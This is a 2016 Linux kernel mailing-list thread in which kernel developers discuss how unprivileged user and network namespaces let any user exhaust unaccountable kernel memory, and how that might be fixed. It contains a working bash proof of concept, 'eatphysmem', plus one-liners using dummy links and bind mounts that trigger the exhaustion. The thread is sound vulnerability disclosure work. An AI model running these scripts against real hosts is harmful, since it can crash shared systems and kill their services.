* [q] userns, netns, and quick physical memory consumption by unprivileged user
@ 2016-03-02 20:38 Yuriy M. Kaminskiy
2016-03-11 15:06 ` Yuriy M. Kaminskiy
0 siblings, 1 reply; 7+ messages in thread
From: Yuriy M. Kaminskiy @ 2016-03-02 20:38 UTC (permalink / raw)
To: netdev
While looking at 759c01142a5d0f364a462346168a56de28a80f52, I remembered about
infamous
nf_conntrack: falling back to vmalloc
message, that was often triggered by network namespace creation (message
was removed recently, but it changed nothing with underlying problem).
So, how about something like this:
$ cat << EOF >> eatphysmem
#!/bin/bash -xe
fd=6
d="`mktemp -d /tmp/eatmemXXXXXXXXX`"
cd "$d"
rule="iptables -A INPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT"
# rule="$rule;$rule"
# ... just because we can; same with any number of ip ro/ru/etc
while :; do
#for i in {1..1024}; do
let fd=fd+1
if [ -e /proc/$$/fd/$fd ]; then continue;fi
mkfifo f1 f2
unshare -rn sh -xec "echo foo >f1;ip li se lo up; $rule;read r <f2" &
pid=$!
read r <f1
eval "exec $fd</proc/$pid/ns/net"
echo bar >f2
wait
rm f2 f1
sleep 1s
done
sleep inf
EOF
$ chmod a+x eatphysmem; unshare -rpf --mount-proc ./eatphysmem
?
You can easily eat 0.5M physical memory per netns (conntrack hash table
(hashsize*sizeof(list_head))) and more, and pin them to single process
with opened netns fds.
What can stop it?
ulimit? What is ulimit? Conntrack knows nothing about them.
Ah-yeah, `ulimit -n`? 64k. 64k*512k = 32G. Per process. Oh-uh.
OOM killer? But this is not this process memory; if any, it will be
killed last.
(I wonder, if memcg can tackle it; probably yes; but how many people
have it configured?).
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: userns, netns, and quick physical memory consumption by unprivileged user
2016-03-02 20:38 [q] userns, netns, and quick physical memory consumption by unprivileged user Yuriy M. Kaminskiy
@ 2016-03-11 15:06 ` Yuriy M. Kaminskiy
2016-03-11 15:34 ` Florian Westphal
2016-03-14 9:14 ` Michal Hocko
0 siblings, 2 replies; 7+ messages in thread
From: Yuriy M. Kaminskiy @ 2016-03-11 15:06 UTC (permalink / raw)
To: netdev; +Cc: containers, linux-kernel
ping (+ more test results at bottom)
On Wed, 02 Mar 2016, I wrote:
> While looking at CVE-2016-2847, I remembered about infamous
> nf_conntrack: falling back to vmalloc
> message, that was often triggered by network namespace creation (message
> was removed recently, but it changed nothing with underlying problem).
>
> So, how about something like this:
>
> $ cat << EOF >> eatphysmem
> #!/bin/bash -xe
> fd=6
> d="`mktemp -d /tmp/eatmemXXXXXXXXX`"
> cd "$d"
> rule="iptables -A INPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT"
> # rule="$rule;$rule"
> # ... just because we can; same with any number of ip li/ro/ru/etc
> while :; do
> let fd=fd+1
> [ ! -e /proc/$$/fd/$fd ] || continue
> mkfifo f1 f2
> unshare -rn sh -xec "echo foo >f1;ip li se lo up; $rule;read r <f2" &
> pid=$!
> read r <f1
> eval "exec $fd</proc/$pid/ns/net"
> echo bar >f2
> wait
> rm f2 f1
> free
> sleep 0.1s
> done
> sleep inf
> EOF
> $ chmod a+x eatphysmem; unshare -rpf --mount-proc ./eatphysmem
> ?
>
> You can easily eat 0.5M physical memory per netns (conntrack hash table
> (hashsize*sizeof(list_head))) and more, and pin them to single process
> with opened netns fds.
> What can stop it?
> ulimit? What is ulimit? Conntrack knows nothing about them.
> Ah-yeah, `ulimit -n`? 64k. 64k*512k = 32G. Per process. Oh-uh.
> OOM killer? But this is not this process memory; if any, it will be
> killed last.
> (I wonder, if memcg can tackle it; probably yes; but how many people
> have it configured?).
I tested in vm with kernel 4.4.2 (from user account, with ulimit
-v 32768); as expected, it quickly eaten all memory, OOM killer went
berserk and killed even systemd-journald and systemd-udevd, but left
this process living (and hogging all physical memory; also note that
swap was enabled - and mostly remained unused).
And also tried with memcg:
t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks;
echo 48M >$t/memory.limit_in_bytes; su testuser [...]
and it has not helped at all (rather opposite, it ended up with killed
init and kernel panic; well, later is pure (un)luck; but point is, memcg
apparently *CANNOT* curb net/ns allocations).
BTW, all those hash/conntrack/etc default sizes was calculated from
physical memory size in assumption there will be only *one* instance of
those tables. Obviously, introduction of network namespaces (and
especially unprivileged user-ns) thrown this assumption in the window
(and here comes that "falling back to vmalloc" message again; in pre-netns
world, those tables were allocated *once* on early system startup, with
typically plenty of free and unfragmented memory).
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: userns, netns, and quick physical memory consumption by unprivileged user
2016-03-11 15:06 ` Yuriy M. Kaminskiy
@ 2016-03-11 15:34 ` Florian Westphal
2016-03-12 11:41 ` Pablo Neira Ayuso
2016-03-12 13:35 ` Yuriy M. Kaminskiy
2016-03-14 9:14 ` Michal Hocko
1 sibling, 2 replies; 7+ messages in thread
From: Florian Westphal @ 2016-03-11 15:34 UTC (permalink / raw)
To: Yuriy M. Kaminskiy; +Cc: netdev, containers, linux-kernel
Yuriy M. Kaminskiy <yumkam@gmail.com> wrote:
> BTW, all those hash/conntrack/etc default sizes was calculated from
> physical memory size in assumption there will be only *one* instance of
> those tables. Obviously, introduction of network namespaces (and
> especially unprivileged user-ns) thrown this assumption in the window
> (and here comes that "falling back to vmalloc" message again; in pre-netns
> world, those tables were allocated *once* on early system startup, with
> typically plenty of free and unfragmented memory).
No idea how to fix this expect by removing conntrack support in net
namespaces completely.
I'd disallow all write accesses to skb->nfct (NAT, CONNMARK,
CONNSECMARK, ...) and then no longer clear skb->nfct when forwarding
packet from init_ns to container.
Containers could then still test conntrack as seen from init namespace pov
in PREROUTING/FORWARD/INPUT (but not OUTPUT, obviously).
[ OUTPUT *might* be doable as well by allowing NEW creation in output
but skipping nat and deferring the confirmation/commit of the new
entry to the table until skb leaves initns ]
We could key conntrack entries to initns conntrack table
instead of adding one new table per netns, but seems like this only
replaces one problem with a new one (filling/blocking initns table from
another netns).
Maybe we could go with a compromise and skip/disallow conntrack in
unpriv userns only?
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: userns, netns, and quick physical memory consumption by unprivileged user
2016-03-11 15:34 ` Florian Westphal
@ 2016-03-12 11:41 ` Pablo Neira Ayuso
2016-03-12 13:35 ` Yuriy M. Kaminskiy
1 sibling, 0 replies; 7+ messages in thread
From: Pablo Neira Ayuso @ 2016-03-12 11:41 UTC (permalink / raw)
To: Florian Westphal
Cc: Yuriy M. Kaminskiy, netdev, containers, linux-kernel,
netfilter-devel
On Fri, Mar 11, 2016 at 04:34:06PM +0100, Florian Westphal wrote:
> Yuriy M. Kaminskiy <yumkam@gmail.com> wrote:
> > BTW, all those hash/conntrack/etc default sizes was calculated from
> > physical memory size in assumption there will be only *one* instance of
> > those tables. Obviously, introduction of network namespaces (and
> > especially unprivileged user-ns) thrown this assumption in the window
> > (and here comes that "falling back to vmalloc" message again; in pre-netns
> > world, those tables were allocated *once* on early system startup, with
> > typically plenty of free and unfragmented memory).
>
> No idea how to fix this expect by removing conntrack support in net
> namespaces completely.
>
> I'd disallow all write accesses to skb->nfct (NAT, CONNMARK,
> CONNSECMARK, ...) and then no longer clear skb->nfct when forwarding
> packet from init_ns to container.
>
> Containers could then still test conntrack as seen from init namespace pov
> in PREROUTING/FORWARD/INPUT (but not OUTPUT, obviously).
>
> [ OUTPUT *might* be doable as well by allowing NEW creation in output
> but skipping nat and deferring the confirmation/commit of the new
> entry to the table until skb leaves initns ]
>
> We could key conntrack entries to initns conntrack table
> instead of adding one new table per netns, but seems like this only
> replaces one problem with a new one (filling/blocking initns table from
> another netns).
We can add a global perns limit in terms of conntrack entries that can
only be set via CAP_NET_ADMIN from the initns. Thus, we avoid the
filling/blocking from another netns, or hide this knob to
unpriviledged userns somehow.
In the previous netfilter workshop I remember we agreed on going
towards having a single conntrack table for netns, so I suggest we
follow that direction.
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: userns, netns, and quick physical memory consumption by unprivileged user
2016-03-11 15:34 ` Florian Westphal
2016-03-12 11:41 ` Pablo Neira Ayuso
@ 2016-03-12 13:35 ` Yuriy M. Kaminskiy
1 sibling, 0 replies; 7+ messages in thread
From: Yuriy M. Kaminskiy @ 2016-03-12 13:35 UTC (permalink / raw)
To: netdev; +Cc: linux-kernel, containers
On 03/11/16 18:34 , Florian Westphal wrote:
> Yuriy M. Kaminskiy <yumkam@gmail.com> wrote:
>> BTW, all those hash/conntrack/etc default sizes was calculated from
>> physical memory size in assumption there will be only *one* instance of
>> those tables. Obviously, introduction of network namespaces (and
>> especially unprivileged user-ns) thrown this assumption in the window
>> (and here comes that "falling back to vmalloc" message again; in pre-netns
>> world, those tables were allocated *once* on early system startup, with
>> typically plenty of free and unfragmented memory).
>
> No idea how to fix this expect by removing conntrack support in net
> namespaces completely.
Well, it is not *only* conntrack. Conntrack eats big chunks at once, but
there are other things that eat kernel memory too: *any* iptables
rules, 'ip address', 'ip link' (at very least, 'type dummy' and
/dev/net/tun are available inside unprivileged userns/netns), 'ip
tunnel', 'ip rule', 'ip route', etc.
Just add *a lot* of them (and over several netns to avoid potential
O(n^2) behaviour on adding), and it will be painful, regardless of
memcg/ulimits/free swap/etc.
E.g. something like
unshare -rn sh -c 'setsid sleep inf & for i in 1 1024; do
ip li add d$i type dummy; ip li set d$i up;done'
eats ~40M kernel memory each (unswappable and not curbed by memcg),
that's way more than conntrack hashtables alone.
At *very minimum*, all that must be limited by memcg (it is not
currently!). And maybe by ulimits too (of process that created userns?
well, natural choice of RLIMIT_MEMLOCK practically forbids netns, no
chance it will fit in 64k).
Specifically with conntrack, separate limits on hash size/entries for
non-initns won't harm, but that's more of "flexibility to avoid
senseless waste of memory" (in case specific container won't use many
connection or won't use conntrack at all) than protection against abuse.
By the way, there are unrestrained kernel memory consumption in *other*
namespace types too. E.g., let's look at mount namespace; it looks like
tmpfs contents is at least curbed by memcg [but *not* curbed by
ulimits!], however *mounts itself* are not; e.g.
unshare -rm sh -c 'while :; do seq -f /tmp/foo%g 1 1024|
while read d; do mkdir -p $d; mount --bind $d $d;done'
is a bit slower [try with several instances?], but end result
would be same).
> I'd disallow all write accesses to skb->nfct (NAT, CONNMARK,
> CONNSECMARK, ...) and then no longer clear skb->nfct when forwarding
> packet from init_ns to container.
>
> Containers could then still test conntrack as seen from init namespace pov
> in PREROUTING/FORWARD/INPUT (but not OUTPUT, obviously).
>
> [ OUTPUT *might* be doable as well by allowing NEW creation in output
> but skipping nat and deferring the confirmation/commit of the new
> entry to the table until skb leaves initns ]
>
> We could key conntrack entries to initns conntrack table
> instead of adding one new table per netns, but seems like this only
> replaces one problem with a new one (filling/blocking initns table from
> another netns).
>
> Maybe we could go with a compromise and skip/disallow conntrack in
> unpriv userns only?
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: userns, netns, and quick physical memory consumption by unprivileged user
2016-03-11 15:06 ` Yuriy M. Kaminskiy
2016-03-11 15:34 ` Florian Westphal
@ 2016-03-14 9:14 ` Michal Hocko
2016-03-14 15:12 ` Yuriy M. Kaminskiy
1 sibling, 1 reply; 7+ messages in thread
From: Michal Hocko @ 2016-03-14 9:14 UTC (permalink / raw)
To: Yuriy M. Kaminskiy; +Cc: linux-kernel, netdev, containers
On Fri 11-03-16 18:06:59, Yuriy M. Kaminskiy wrote:
[...]
> And also tried with memcg:
> t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks;
> echo 48M >$t/memory.limit_in_bytes; su testuser [...]
> and it has not helped at all (rather opposite, it ended up with killed
> init and kernel panic; well, later is pure (un)luck; but point is, memcg
> apparently *CANNOT* curb net/ns allocations).
It seems you were using memcg v1 here. This didn't have the kernel
memory accounting enabled by default. With the v2 you get both user and
kernel (well some subset of it) accounting enabled. Whether we account
also netns related data structures sufficiently is a question. I haven't
checked. But it would be worth trying and fix.
--
Michal Hocko
SUSE Labs
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: userns, netns, and quick physical memory consumption by unprivileged user
2016-03-14 9:14 ` Michal Hocko
@ 2016-03-14 15:12 ` Yuriy M. Kaminskiy
0 siblings, 0 replies; 7+ messages in thread
From: Yuriy M. Kaminskiy @ 2016-03-14 15:12 UTC (permalink / raw)
To: netdev; +Cc: linux-kernel, containers
On 03/14/16 12:14 , Michal Hocko wrote:
> On Fri 11-03-16 18:06:59, Yuriy M. Kaminskiy wrote:
> [...]
>> And also tried with memcg:
>> t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks;
>> echo 48M >$t/memory.limit_in_bytes; su testuser [...]
>> and it has not helped at all (rather opposite, it ended up with killed
>> init and kernel panic; well, later is pure (un)luck; but point is, memcg
>> apparently *CANNOT* curb net/ns allocations).
>
> It seems you were using memcg v1 here. This didn't have the kernel
> memory accounting enabled by default. With the v2 you get both user and
Hrr. Indeed. And used (distro) kernel compiled without MEMCG_KMEM, so
this test was useless. (However, as distro kernel lacks MEMCG_KMEM, it
means most users won't be able to use it as well[*], so unpriv userns are
unsafe to use for all of them and should be disabled).
That said, not sure if it would have helped in kernels <= 4.4 (would
those allocation be called in context that allows them to be
accounted by [correct] memcg?), but it looks like with upcoming change to
whitelisting (explicit GPF_ACCOUNT), it won't (as almost nothing in
net/* uses it).
> kernel (well some subset of it) accounting enabled. Whether we account
> also netns related data structures sufficiently is a question. I haven't
Except for conntrack tables, it is not exactly tied to netnes, it's
regular CAP_NET_ADMIN things (routing, addresses, links, iptables, etc
that can be added via netlink messages). Just userns+netns gives right
to tweak with them to regular user.
> checked. But it would be worth trying and fix.
^ permalink raw reply [flat|nested] 7+ messages in thread
end of thread, other threads:[~2016-03-14 15:13 UTC | newest]
Thread overview: 7+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2016-03-02 20:38 [q] userns, netns, and quick physical memory consumption by unprivileged user Yuriy M. Kaminskiy
2016-03-11 15:06 ` Yuriy M. Kaminskiy
2016-03-11 15:34 ` Florian Westphal
2016-03-12 11:41 ` Pablo Neira Ayuso
2016-03-12 13:35 ` Yuriy M. Kaminskiy
2016-03-14 9:14 ` Michal Hocko
2016-03-14 15:12 ` Yuriy M. Kaminskiy
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).